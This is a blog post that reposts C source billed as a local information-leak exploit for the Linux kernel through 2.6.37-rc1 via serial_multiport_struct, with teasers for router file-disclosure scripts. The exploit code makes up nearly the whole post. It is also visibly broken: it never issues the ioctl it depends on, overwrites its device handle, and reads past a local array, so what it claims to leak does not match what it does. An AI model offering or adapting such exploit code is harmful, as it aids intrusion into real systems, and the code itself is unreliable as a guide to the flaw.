Linux 2.6.37-rc1 ‘serial_multiport_struct’ Local Leak PoC

Linux 2.6.37-rc1 ‘serial_multiport_struct’ Local Leak PoC

Posted by ethical-hacker | Monday December 5th, 2016 | Vulnerabilities
/* Linux <= 2.6.37-rc1 serial_multiport_struct Local Leak Exploit
 *
 *  ./splitmilk2 leak 134514859
 * [\m/] Linux <= 2.6.37-rc1 serial_multiport_struct Local  Leak Exploit
 * [\m/] by Todor Donev
 *  [x] Leakfile    : leak
 *  [x] Reservedsize    : 134514859
 * [+] Leaking.. =)
 * ...
 *
 *
 * Greets to prdelka,
 * for splitmilk.c release, Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT
leak exploit
 *
 * Thanks to Tsvetelina Emirska,
 * that support, respect and inspire me..
 *
 * Yes,    I know thats lame, but I was so bored and lazy for better.
 *
 * Author: Todor Donev
 * Author email: [[email protected]]
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <termios.h>
#include <linux/serial.h>

#define DEVICE "/dev/ttyS1"

int main(int argc, char* argv[]) {
    int ret = 0;
    int i, fd, reservedsize;
    char* buf;
    struct  serial_multiport_struct  buffer;
    printf("[\\m/] Linux <= 2.6.37-rc1 serial_multiport_struct Local Leak
Exploit\n");
    printf("[\\m/] by Todor Donev\n");
    fd = open(DEVICE, O_RDONLY);
    if (fd <0) {
    printf("[-] Error: f0k\n");
    exit(-1);
}
    if (argc < 2) {
        fprintf(stderr, "[!] usg: %s <leakfile> <reservedsize>\n", argv[0]);
        exit(-1);
    }
    if (argc > 2)
        if ((reservedsize = atoi(argv[2])) == 0) {
            fprintf(stderr, " [-] Sorry: (atoi) invalid outsize\n");
            exit(-1);
        }
    fprintf(stderr, "  [x] Leakfile: %s\n", argv[1]);
    fprintf(stderr, "  [x] Reservedsize: %u\n", reservedsize);
     if ((buf = (char *)malloc(reservedsize)) == NULL) {
        perror("Sorry: (malloc)");
        fprintf(stderr, " [-] Sorry: Try again with other output size\n");
        exit(1);
    }
    memset(&buffer,0,sizeof(
buffer));
    printf("[+] Leaking.. =)\n");
    if((fd = open(argv[1], O_RDWR | O_CREAT, 0640)) == -1){
    printf("[-] Error: f0k =(\n");
    exit(-1);
    }
    for(i=0;i<=reservedsize;i++){
        ret += write(fd,&buffer.reserved[i],sizeof(int));
    }
    close(fd);
    printf("\\o/ %d bytez\n",ret);
    exit(0);
}

Add a comment

Related Blogs

ethical hacker
Posted by ethical-hacker | 05 December 2016
#!/bin/sh # # D-Link ADSL ROUTER DSL-2750E SEA_1.07 # Remote File Disclosure # # Modem Name: DSL-2750E # Firmware Version: SEA_1.07 # # Copyright 2016 (c) Todor Donev # &amp;lt;todor.donev...
ethical hacker
Posted by ethical-hacker | 05 December 2016
#!/bin/sh # # NETGEAR ADSL ROUTER JNR2010 1.0.0.20 # Authenticated Remote File Disclosure # # Hardware Version: JNR2010 # Firmware Version: 1.0.0.20 # # Copyright 2016 (c) Todor Donev #...
ethical hacker
Posted by ethical-hacker | 05 December 2016
#!/bin/sh # # NETGEAR ADSL ROUTER JNR1010 1.0.0.32 # Authenticated Remote File Disclosure # # Hardware Version: JNR1010 # Firmware Version: 1.0.0.32 # # Copyright 2016 (c) Todor Donev #...